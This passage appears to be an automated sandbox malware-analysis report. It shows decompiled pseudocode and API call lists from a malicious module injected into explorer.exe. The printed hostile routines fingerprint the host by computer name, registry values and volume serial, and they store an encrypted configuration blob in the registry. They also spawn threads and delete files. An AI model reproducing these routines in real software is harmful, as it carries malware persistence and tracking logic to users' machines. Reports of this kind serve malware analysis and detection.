      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 100%
    			E007C47AC(CHAR* __eax, void** __edx) {
    				CHAR* _v8;
    				void** _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				long _v28;
    				void* _t27;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0xffffffff;
    				 *_v12 = 0;
    				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v20 = _t27;
    				if(_v20 == 0xffffffff) {
    					_v20 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v20 != 0xffffffff) {
    					_v24 = GetFileSize(_v20, 0);
    					if(_v24 != 0) {
    						E007C13B4(_v12, _v24 + 1); // executed
    						ReadFile(_v20,  *_v12, _v24,  &_v28, 0); // executed
    						CloseHandle(_v20);
    						_v16 = _v24;
    					}
    				}
    				return _v16;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C47D9
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C47FB
    • GetFileSize.KERNEL32(?,00000000), ref: 007C4810
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C483F
    • CloseHandle.KERNEL32(?), ref: 007C4849

    Control-flow Graph

    C-Code - Quality: 28%
    			E007C8258(char* __eax) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				signed int _v20;
    				char _v84;
    				char _v484;
    				intOrPtr _t31;
    				void* _t46;
    
    				_v8 = __eax;
    				 *_v8 = 0;
    				 *0x7cb3c0(0x101,  &_v484);
    				gethostname( &_v84, 0x40); // executed
    				_t31 =  *0x7cb3e0( &_v84); // executed
    				_v12 = _t31;
    				if(_v12 != 0) {
    					_v16 =  *((intOrPtr*)(_v12 + 0xc));
    					_v20 = 0;
    					while( *((intOrPtr*)(_v16 + _v20 * 4)) != 0) {
    						E007C133C(_v8,  *0x7cb344( *((intOrPtr*)( *((intOrPtr*)(_v16 + _v20 * 4))))));
    						E007C133C(_v8, E007C82F4);
    						_t46 = _t46 + 0x10;
    						_v20 = _v20 + 1;
    					}
    					return  *0x7cb3d8();
    				}
    				return _t31;
    			}

    C-Code - Quality: 100%
    			E007C4BA0(intOrPtr* __eax) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t78;
    				intOrPtr _t82;
    				void* _t84;
    				intOrPtr _t87;
    				void* _t89;
    				intOrPtr _t92;
    				void* _t94;
    				intOrPtr _t98;
    				CHAR* _t109;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_t78 =  *0x7ca25c; // 0x7c2174
    				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36); // executed
    				_v12 = 0x101;
    				_t82 =  *0x7ca0e4; // 0x7c1d14
    				_t84 = E007C38B0(_v36, _t82, 0, 0,  &_v298,  &_v12); // executed
    				if(_t84 == 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t87 =  *0x7ca0e8; // 0x7c1d20
    				_t89 = E007C38B0(_v36, _t87, 0, 0,  &_v298,  &_v12); // executed
    				if(_t89 == 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t92 =  *0x7ca0ec; // 0x7c1d2c
    				_t94 = E007C38B0(_v36, _t92, 0, 0,  &_v298,  &_v12); // executed
    				if(_t94 == 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t98 =  *0x7ca0f0; // 0x7c1d3c
    				E007C38B0(_v36, _t98, 0, 0,  &_v20,  &_v12); // executed
    				E007C3890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t109 =  *0x7ca268; // 0x7c21d0
    				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E007C1164(_v32,  &_v298);
    				E007C1308(_v8,  &_v298);
    				E007C1164(_v16,  &_v298);
    				E007C133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E007C118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E007C1164(_v41,  &_v298);
    				return E007C133C(_v8,  &(( &_v298)[6]));
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 007C4BC3
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C4C01
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C4D40
    C-Code - Quality: 100%
    			E007C4B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t80;
    				intOrPtr _t84;
    				void* _t86;
    				intOrPtr _t89;
    				void* _t91;
    				intOrPtr _t94;
    				void* _t96;
    				intOrPtr _t100;
    				CHAR* _t111;
    
    				_a122 = _a122 + __edx;
    				 *__eax =  *__eax + __eax;
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_t80 =  *0x7ca25c; // 0x7c2174
    				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36); // executed
    				_v12 = 0x101;
    				_t84 =  *0x7ca0e4; // 0x7c1d14
    				_t86 = E007C38B0(_v36, _t84, 0, 0,  &_v298,  &_v12); // executed
    				if(_t86 == 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t89 =  *0x7ca0e8; // 0x7c1d20
    				_t91 = E007C38B0(_v36, _t89, 0, 0,  &_v298,  &_v12); // executed
    				if(_t91 == 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t94 =  *0x7ca0ec; // 0x7c1d2c
    				_t96 = E007C38B0(_v36, _t94, 0, 0,  &_v298,  &_v12); // executed
    				if(_t96 == 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t100 =  *0x7ca0f0; // 0x7c1d3c
    				E007C38B0(_v36, _t100, 0, 0,  &_v20,  &_v12); // executed
    				E007C3890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t111 =  *0x7ca268; // 0x7c21d0
    				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E007C1164(_v32,  &_v298);
    				E007C1308(_v8,  &_v298);
    				E007C1164(_v16,  &_v298);
    				E007C133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E007C118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E007C1164(_v41,  &_v298);
    				return E007C133C(_v8,  &(( &_v298)[6]));
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 007C4BC3
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C4C01
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C4D40
    C-Code - Quality: 100%
    			E007C64BC(char* __eax, char __edx, void* __eflags) {
    				char* _v8;
    				char _v9;
    				struct _OSVERSIONINFOA _v168;
    				char _v233;
    				intOrPtr _t68;
    				void* _t73;
    
    				_v9 = __edx;
    				_v8 = __eax;
    				E007C1258(_v8, 0x51);
    				 *_v8 = _v9;
    				E007C12B8(_v8 + 0x10, 0x12, 0x7cb719);
    				E007C12B8(_v8 + 1, E007C12DC(0x7cb794), 0x7cb794);
    				E007C1258( &_v168, 0x9c);
    				_v168.dwOSVersionInfoSize = 0x9c;
    				GetVersionExA( &_v168);
    				E007C1864(_v168.dwMajorVersion,  &_v233);
    				 *((char*)(_v8 + 0x22)) = _v233;
    				 *((char*)(_v8 + 0x23)) = 0x2e;
    				E007C1864(_v168.dwMinorVersion,  &_v233);
    				 *((char*)(_v8 + 0x24)) = _v233;
    				_t68 =  *0x7ca068; // 0x3
    				E007C1864(_t68,  &_v233);
    				 *((char*)(_v8 + 0x26)) = _v233;
    				if( *0x7ca058 == 0) {
    					 *((char*)(_v8 + 0x27)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x27)) = 0x31;
    				}
    				if( *0x7ca034 == 0) {
    					 *((char*)(_v8 + 0x28)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x28)) = 0x31;
    				}
    				_t73 = E007C3EA0(); // executed
    				if(_t73 == 0) {
    					 *((char*)(_v8 + 0x25)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x25)) = 0x31;
    				}
    				 *((intOrPtr*)(_v8 + 0x29)) = E007C5468();
    				return E007C1308(_v8 + 0x2d, 0x7cb00c);
    			}

    APIs
    • GetVersionExA.KERNEL32(0000009C), ref: 007C6530
      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
      • Part of subcall function 007C3EA0: RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3ECD
      • Part of subcall function 007C3EA0: RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3EF3
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
    C-Code - Quality: 88%
    			E007C3EA0() {
    				signed char _v8;
    				void* _v12;
    				char _v16;
    				char* _t13;
    				signed int _t18;
    				char* _t25;
    
    				if( *0x7ca034 == 0) {
    					_t13 =  *0x7ca260; // 0x7c21a4
    					RegCreateKeyExA(0x80000001, _t13, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
    				} else {
    					_t25 =  *0x7ca260; // 0x7c21a4
    					RegCreateKeyExA(0x80000002, _t25, 0, 0, 0, 0xf003f, 0,  &_v12, 0); // executed
    				}
    				_v16 = 0;
    				_t18 = E007C38B0(_v12, "qzdayh", 0, 0, 0,  &_v16); // executed
    				asm("sbb eax, eax");
    				_v8 =  ~(_t18 & 0xffffff00 | _v16 != 0x00000000);
    				E007C3890(_v12);
    				return _v8;
    			}

    APIs
    • RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3ECD
    • RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3EF3
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    C-Code - Quality: 100%
    			E007C471C(intOrPtr __eax, void __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void _v16;
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v28;
    				long _v32;
    				intOrPtr _t34;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v28 = E007C12DC(_v8) + 1;
    				_v24 = E007C13DC(_v28 + 4);
    				 *_v24 = _v16;
    				E007C12B8(_v24 + 4, _v28, _v8);
    				if(_v12 == 0) {
    					_t34 = E007C4608(_v24); // executed
    					_v20 = _t34;
    				} else {
    					_v32 = CreateThread(0, 0, E007C4608, _v24, 0,  &_v32);
    					SetThreadPriority(_v32, 0xfffffff1);
    					CloseHandle(_v32);
    				}
    				return _v20;
    			}

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
    • SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
    • CloseHandle.KERNEL32(?), ref: 007C4790
      • Part of subcall function 007C4608: CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 007C465B
      • Part of subcall function 007C4608: GetFileSize.KERNEL32(000000FF,00000000), ref: 007C4670
      • Part of subcall function 007C4608: WriteFile.KERNELBASE(000000FF,?,00000200,?,00000000), ref: 007C46A4
      • Part of subcall function 007C4608: FlushFileBuffers.KERNEL32(000000FF), ref: 007C46B6
      • Part of subcall function 007C4608: CloseHandle.KERNEL32(000000FF), ref: 007C46C0
      • Part of subcall function 007C4608: DeleteFileA.KERNELBASE(?), ref: 007C46CA
      • Part of subcall function 007C4608: Sleep.KERNEL32(00000064), ref: 007C46E7
      • Part of subcall function 007C4608: Sleep.KERNEL32(00000064), ref: 007C46FA
    C-Code - Quality: 100%
    			E007C8BF8(intOrPtr* __eax, void* __edx) {
    				void* _v4;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				char _v20;
    				intOrPtr _v117;
    				char _v273;
    				char _v277;
    				char* _t29;
    				intOrPtr _t34;
    				void* _t36;
    				intOrPtr _t40;
    				short _t55;
    
    				 *__eax =  *__eax + __eax;
    				_v117 = _v117 + __edx;
    				_t29 =  *0x7ca25c; // 0x7c2174
    				RegOpenKeyExA(0x80000002, _t29, 0, 0x20119,  &_v4); // executed
    				_v8 = 0;
    				_v16 = 0x101;
    				_t34 =  *0x7ca0e4; // 0x7c1d14
    				_t36 = E007C38B0(_v4, _t34, 0, 0,  &_v273,  &_v16); // executed
    				if(_t36 == 0) {
    					_v12 = E007C1BA8(_v12, E007C12DC( &_v277),  &_v277);
    				}
    				_v20 = 4;
    				_v16 = 0;
    				_t40 =  *0x7ca0f0; // 0x7c1d3c
    				E007C38B0(_v8, _t40, 0, 0,  &_v16,  &_v20); // executed
    				E007C3890(_v8);
    				 *0x7ca03c = _v12;
    				 *0x7ca040 = _v16;
    				 *0x7ca044 = _v12 ^ _v16 ^ 0xaf15f9fc;
    				 *0x7ca048 = _v12 ^ 0xbf2bf9fd;
    				 *0x7ca04c = _v12;
    				 *0x7ca04e = E007C1884(_v12);
    				_t55 = _v16;
    				 *0x7ca050 = _t55;
    				return _t55;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C8C1B
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    C-Code - Quality: 100%
    			E007C8BFC() {
    				void* _v8;
    				signed int _v12;
    				signed int _v16;
    				char _v20;
    				char _v277;
    				char* _t26;
    				intOrPtr _t31;
    				void* _t33;
    				intOrPtr _t37;
    				short _t52;
    
    				_t26 =  *0x7ca25c; // 0x7c2174
    				RegOpenKeyExA(0x80000002, _t26, 0, 0x20119,  &_v8); // executed
    				_v12 = 0;
    				_v20 = 0x101;
    				_t31 =  *0x7ca0e4; // 0x7c1d14
    				_t33 = E007C38B0(_v8, _t31, 0, 0,  &_v277,  &_v20); // executed
    				if(_t33 == 0) {
    					_v12 = E007C1BA8(_v12, E007C12DC( &_v277),  &_v277);
    				}
    				_v20 = 4;
    				_v16 = 0;
    				_t37 =  *0x7ca0f0; // 0x7c1d3c
    				E007C38B0(_v8, _t37, 0, 0,  &_v16,  &_v20); // executed
    				E007C3890(_v8);
    				 *0x7ca03c = _v12;
    				 *0x7ca040 = _v16;
    				 *0x7ca044 = _v12 ^ _v16 ^ 0xaf15f9fc;
    				 *0x7ca048 = _v12 ^ 0xbf2bf9fd;
    				 *0x7ca04c = _v12;
    				 *0x7ca04e = E007C1884(_v12);
    				_t52 = _v16;
    				 *0x7ca050 = _t52;
    				return _t52;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C8C1B
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    C-Code - Quality: 70%
    			E007C3E98(intOrPtr* __eax, void* __edx) {
    				signed char _v8;
    				void* _v12;
    				char _v16;
    				intOrPtr _v117;
    				char* _t16;
    				signed int _t21;
    				char* _t28;
    
    				asm("das");
    				asm("das");
    				 *__eax =  *__eax + __eax;
    				asm("das");
    				 *__eax =  *__eax + __eax;
    				_v117 = _v117 + __edx;
    				if( *0x7ca034 == 0) {
    					_t16 =  *0x7ca260; // 0x7c21a4
    					RegCreateKeyExA(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
    				} else {
    					_t28 =  *0x7ca260; // 0x7c21a4
    					RegCreateKeyExA(0x80000002, _t28, 0, 0, 0, 0xf003f, 0,  &_v12, 0); // executed
    				}
    				_v16 = 0;
    				_t21 = E007C38B0(_v12, "qzdayh", 0, 0, 0,  &_v16); // executed
    				asm("sbb eax, eax");
    				_v8 =  ~(_t21 & 0xffffff00 | _v16 != 0x00000000);
    				E007C3890(_v12);
    				return _v8;
    			}

    APIs
    • RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3ECD
    • RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3EF3
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    C-Code - Quality: 100%
    			E007C7304(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char* _t41;
    				char* _t78;
    				long _t79;
    
    				_v8 = __eax;
    				_v12 = 0;
    				if( *0x7ca034 == 0) {
    					_t41 =  *0x7ca260; // 0x7c21a4
    					_v20 = RegOpenKeyExA(0x80000001, _t41, 0, 0xf003f,  &_v16);
    				} else {
    					_t78 =  *0x7ca260; // 0x7c21a4
    					_t79 = RegOpenKeyExA(0x80000002, _t78, 0, 0xf003f,  &_v16); // executed
    					_v20 = _t79;
    				}
    				if(_v20 == 0) {
    					_v28 = 0;
    					if(E007C38B0(_v16, 0, 0, 0, 0,  &_v28) == 0 && _v28 > 0) {
    						_v24 = E007C13DC(_v28);
    						_v36 = _v28;
    						_v32 = E007C13DC(_v36);
    						E007C38B0(_v16, 0, 0, 0, _v24,  &_v28);
    						E007C59BC(_v24, 0x7ca03c, _v28,  &_v36, _v32);
    						if(_v36 == 0x188) {
    							E007C72C4(_v32);
    							_v40 = _v32;
    							if( *((intOrPtr*)(_v40 + 0x11d)) == 0 &&  *((intOrPtr*)(_v40 + 0x121)) == 0) {
    								E007C12B8(_v8, 0x188, _v32);
    								_v12 = 0xffffffff;
    							}
    						}
    						E007C1440(_v24);
    						E007C1440(_v32);
    					}
    					E007C3890(_v16);
    				}
    				return _v12;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,007C21A4,00000000,000F003F,?), ref: 007C7331
    • RegOpenKeyExA.ADVAPI32(80000001,007C21A4,00000000,000F003F,?), ref: 007C7352
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    C-Code - Quality: 100%
    			E007C7474(intOrPtr __eax, void* __eflags) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v412;
    				char* _t35;
    				char* _t44;
    				void* _t54;
    
    				_t54 = __eflags;
    				_v8 = __eax;
    				E007C12B8( &_v412, 0x188, _v8);
    				E007C72C4( &_v412); // executed
    				_v20 = 0;
    				E007C5894( &_v412, 0x7ca03c, 0x188, _t54,  &_v20, 0); // executed
    				_v16 = E007C13DC(_v20);
    				E007C5894( &_v412, 0x7ca03c, 0x188, _t54,  &_v20, _v16); // executed
    				if( *0x7ca034 == 0) {
    					_t35 =  *0x7ca260; // 0x7c21a4
    					RegCreateKeyExA(0x80000001, _t35, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
    				} else {
    					_t44 =  *0x7ca260; // 0x7c21a4
    					RegCreateKeyExA(0x80000002, _t44, 0, 0, 0, 0xf003f, 0,  &_v12, 0); // executed
    				}
    				E007C3930(_v12, 0, 0, 3, _v16, _v20); // executed
    				return E007C3890(_v12);
    			}

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C750D
    • RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C7533
      • Part of subcall function 007C3930: RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 007C394C
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    C-Code - Quality: 50%
    			E007C8B98(intOrPtr __eax) {
    				intOrPtr _v8;
    				intOrPtr _t16;
    				void* _t19;
    
    				_v8 = __eax;
    				_t23 =  *0x7ca034;
    				if( *0x7ca034 == 0) {
    					 *0x7cb21c(0, _v8, 0x1a, 0xffffffff);
    					E007C133C(_v8, E007C8BF8);
    				} else {
    					 *0x7cb21c(0, _v8, 0x26, 0xffffffff);
    					_t16 =  *0x7ca090; // 0x7c1c10
    					E007C133C(_v8, _t16);
    				}
    				return E007C7560(_v8, _t19, _t23);
    			}

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 007C8BB2
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C8BD6
    C-Code - Quality: 88%
    			E007C8064(void* __eax, char* __ecx, char* __edx) {
    				void* _v8;
    				char* _v12;
    				char* _v16;
    				signed char _v20;
    				void* _v24;
    				long _t20;
    				signed int _t24;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_t20 = RegOpenKeyExA(_v8, _v12, 0, 0xf003f,  &_v24); // executed
    				if(_t20 == 0) {
    					_t24 = RegDeleteValueA(_v24, _v16);
    					asm("sbb eax, eax");
    					_v20 =  ~(_t24 & 0xffffff00 | _t24 == 0x00000000);
    					E007C3890(_v24);
    				}
    				return _v20;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
    • RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 25%
    			E007C453C(void* __eax) {
    				void* _v8;
    				char _v9;
    				signed int _v16;
    				void* _t16;
    
    				_v8 = __eax;
    				_v9 = 0;
    				if(_v8 == 0 || _v8 == 0xffffffff) {
    					_v8 = GetCurrentProcess();
    				}
    				if( *0x7cb250 != 0) {
    					_t16 =  *0x7cb250(_v8,  &_v16); // executed
    					if(_t16 != 0) {
    						asm("sbb eax, eax");
    						_v9 =  ~( ~_v16);
    					}
    				}
    				return _v9;
    			}
    Addresses: 0x007c4542, 0x007c4545, 0x007c454d, 0x007c455b, 0x007c455b, 0x007c4565, 0x007c456f, 0x007c4577, 0x007c457e, 0x007c4582, 0x007c4582, 0x007c4577, 0x007c458b

    APIs
    • GetCurrentProcess.KERNEL32 ref: 007C4555
    • IsWow64Process.KERNELBASE(00000000,?), ref: 007C456F
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C8B6C() {
    				long _v8;
    				void* _t5;
    
    				_t5 = CreateThread(0, 0, E007C8AA4, 0, 0,  &_v8); // executed
    				_v8 = _t5;
    				return CloseHandle(_v8);
    			}
    Addresses: 0x007c8b81, 0x007c8b87, 0x007c8b96

    APIs
    • CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 007C8B81
    • CloseHandle.KERNEL32(?), ref: 007C8B8E
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C13DC(long __eax) {
    				long _v8;
    				void* _v12;
    				void* _t8;
    
    				_v8 = __eax;
    				_t8 = RtlAllocateHeap(GetProcessHeap(), 0, _v8); // executed
    				_v12 = _t8;
    				return _v12;
    			}
    Addresses: 0x007c13e2, 0x007c13f2, 0x007c13f8, 0x007c1401

    APIs
    • GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
    • RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C89D2() {
    				long _v8;
    				char _v17;
    				long _v24;
    				long _v28;
    				CHAR* _t16;
    				intOrPtr _t21;
    				intOrPtr _t23;
    				void* _t24;
    
    				_t16 =  *0x7ca268; // 0x7c21d0
    				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
    				_v8 = _v8 ^ 0xc1b5f2f0;
    				E007C1164(_v8,  &_v17);
    				_t21 =  *0x7ca260; // 0x7c21a4
    				E007C133C(_t21,  &_v17);
    				_t23 =  *0x7ca260; // 0x7c21a4
    				_t24 = E007C133C(_t23, E007C8A44);
    				_v8 = _v8 ^ 0xc6b7feb7;
    				_v8 = _v8 ^ 0x183cca04;
    				return _t24;
    			}
    Addresses: 0x007c89ee, 0x007c89f4, 0x007c89fa, 0x007c8a07, 0x007c8a10, 0x007c8a16, 0x007c8a23, 0x007c8a29, 0x007c8a31, 0x007c8a38, 0x007c8a42

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C89F4
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C89D4() {
    				long _v8;
    				char _v17;
    				long _v24;
    				long _v28;
    				CHAR* _t16;
    				intOrPtr _t21;
    				intOrPtr _t23;
    				void* _t24;
    
    				_t16 =  *0x7ca268; // 0x7c21d0
    				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
    				_v8 = _v8 ^ 0xc1b5f2f0;
    				E007C1164(_v8,  &_v17);
